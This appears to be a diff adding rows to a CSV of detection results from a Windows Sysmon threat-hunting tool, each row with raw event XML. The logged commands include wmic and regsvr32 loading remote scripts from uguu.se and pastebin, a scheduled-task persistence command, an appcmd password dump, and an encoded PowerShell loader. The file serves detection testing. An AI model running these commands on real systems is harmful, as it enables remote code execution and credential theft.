+    <Data Name=""ProcessGuid"">365ABB72-CF01-5CE6-0000-00105DA50C00</Data>
+    <Data Name=""ProcessId"">3872</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">wmic  process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">c:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
+    <Data Name=""LogonId"">0xf347</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-CE84-5CE6-0000-001094130600</Data>
+    <Data Name=""ParentProcessId"">2940</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:35:05.780949Z"">
+    </TimeCreated>
+    <EventRecordID>16793</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1880"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:35:05.765</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-001085031000</Data>
+    <Data Name=""ProcessId"">1912</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
+    <Data Name=""LogonId"">0x13eee</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
+    <Data Name=""ParentProcessId"">1420</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:35:05.780949Z"">
+    </TimeCreated>
+    <EventRecordID>16793</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1880"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:35:05.765</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-001085031000</Data>
+    <Data Name=""ProcessId"">1912</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
+    <Data Name=""LogonId"">0x13eee</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
+    <Data Name=""ParentProcessId"">1420</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:25.202819Z"">
+    </TimeCreated>
+    <EventRecordID>4915</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:24.152</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
+    <Data Name=""ProcessId"">3000</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49828</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;  /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:56:24.893827Z"">
+    </TimeCreated>
+    <EventRecordID>14</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:56:24.833</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC38-5CB8-0000-0010365E0800</Data>
+    <Data Name=""ProcessId"">3576</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /user</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
+    <Data Name=""LogonId"">0xca21</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ParentProcessId"">1200</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">Powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot;  /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:56:24.893827Z"">
+    </TimeCreated>
+    <EventRecordID>14</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:56:24.833</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC38-5CB8-0000-0010365E0800</Data>
+    <Data Name=""ProcessId"">3576</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /user</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
+    <Data Name=""LogonId"">0xca21</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ParentProcessId"">1200</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">Powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe  /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:59.578070Z"">
+    </TimeCreated>
+    <EventRecordID>6195</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:59.558</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE7B-5CEB-0000-0010D6820C00</Data>
+    <Data Name=""ProcessId"">4044</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Manages scheduled tasks</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\schtasks.exe  /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE7B-5CEB-0000-0010867F0C00</Data>
+    <Data Name=""ParentProcessId"">4012</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Line Number: 0&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.041809Z"">
+    </TimeCreated>
+    <EventRecordID>5910</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.011</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00104C83FF00</Data>
+    <Data Name=""ProcessId"">2472</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Line Number: 0&quot; /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
+    </TimeCreated>
+    <EventRecordID>16116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
+    <Data Name=""ProcessId"">2544</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
+    <Data Name=""ParentProcessId"">3212</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
+  </EventData>
